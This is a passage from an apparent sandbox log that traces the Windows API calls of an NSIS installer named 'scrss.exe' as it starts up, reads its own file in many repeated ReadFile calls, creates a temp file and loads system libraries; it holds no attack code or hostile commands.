dwFlags=0x8) returned 0x6c760000 [0092.564] GetProcAddress (hModule=0x6c760000, lpProcName="SHGetFolderPathW") returned 0x6c761d30 [0092.564] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x76ed0000 [0092.564] GetProcAddress (hModule=0x76ed0000, lpProcName=0x1b5) returned 0x76ee8dd0 [0092.564] IsOS (dwOS=0x1e) returned 1 [0092.566] InitCommonControls () [0092.566] OleInitialize (pvReserved=0x0) returned 0x0 [0092.624] SHGetFileInfoW (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fb8c, cbFileInfo=0x2b4, uFlags=0x0 | out: psfi=0x19fb8c) returned 0x1 [0092.683] lstrcpynW (in: lpString1=0x429220, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0092.684] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe\" " [0092.684] lstrcpynW (in: lpString1=0x435000, lpString2="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe\" ") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe\" " [0092.685] GetTempPathW (in: nBufferLength=0x400, lpBuffer=0x437800 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0092.691] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0092.691] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0092.692] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0092.692] GetLastError () returned 0xb7 [0092.692] GetTickCount () returned 0x13f0fbf [0092.692] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsj", uUnique=0x0, lpTempFileName=0x437000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjFBF.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjfbf.tmp")) returned 0xfbf [0092.694] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjFBF.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjfbf.tmp")) returned 1 [0092.694] GetTickCount () returned 0x13f0fbf [0092.694] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x438800, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\scrss.exe")) returned 0x27 [0092.695] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\scrss.exe")) returned 0x20 [0092.695] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\scrss.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x210 [0092.695] lstrcpynW (in: lpString1=0x436800, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe" [0092.695] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe") returned 39 [0092.695] lstrcpynW (in: lpString1=0x439000, lpString2="scrss.exe", iMaxLength=1024 | out: lpString1="scrss.exe") returned="scrss.exe" [0092.696] GetFileSize (in: hFile=0x210, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35930 [0092.696] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.696] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.697] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.698] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.699] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0092.700] SetFilePointer (in: hFile=0x210, lDistanceToMove=36892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x901c [0092.700] ReadFile (in: hFile=0x210, lpBuffer=0x19fb3c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x19fb3c*, lpNumberOfBytesRead=0x19fa7c*=0x4, lpOverlapped=0x0) returned 1 [0092.700] GetTickCount () returned 0x13f0fbf [0092.701] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x5cb, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19fa7c*=0x5cb, lpOverlapped=0x0) returned 1 [0092.722] GetTickCount () returned 0x13f0fcf [0092.722] GetTickCount () returned 0x13f0fcf [0092.722] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95eb [0092.722] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76410000 [0092.722] GetProcAddress (hModule=0x76410000, lpProcName="GetUserDefaultUILanguage") returned 0x7642b0a0 [0092.722] GetUserDefaultUILanguage () returned 0x409 [0092.724] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0092.724] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0092.724] lstrlenW (lpString="fogodgpvcty") returned 11 [0092.724] lstrcpynW (in: lpString1=0x429220, lpString2="fogodgpvcty Setup", iMaxLength=1024 | out: lpString1="fogodgpvcty Setup") returned="fogodgpvcty Setup" [0092.724] SetWindowTextW (hWnd=0x0, lpString="fogodgpvcty Setup") returned 0 [0092.725] lstrcpynW (in: lpString1=0x612c3c, lpString2="magzkerjmye", iMaxLength=1024 | out: lpString1="magzkerjmye") returned="magzkerjmye" [0092.725] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0092.725] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0092.725] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0092.725] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0092.725] lstrcpynW (in: lpString1=0x435800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0092.725] LoadImageW (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x1a0233 [0092.739] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0092.739] lstrlenW (lpString="fogodgpvcty") returned 11 [0092.739] lstrcpynW (in: lpString1=0x429220, lpString2="fogodgpvcty Setup", iMaxLength=1024 | out: lpString1="fogodgpvcty Setup") returned="fogodgpvcty Setup" [0092.739] SetWindowTextW (hWnd=0x0, lpString="fogodgpvcty Setup") returned 0 [0092.739] lstrcpynW (in: lpString1=0x612c3c, lpString2="magzkerjmye", iMaxLength=1024 | out: lpString1="magzkerjmye") returned="magzkerjmye" [0092.739] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0092.739] GetSystemDirectoryW (in: lpBuffer=0x19f914, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0092.739] wsprintfW (in: param_1=0x19f93a, param_2="%s%S.dll" | out: param_1="\\RichEd20.dll") returned 13 [0092.739] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) 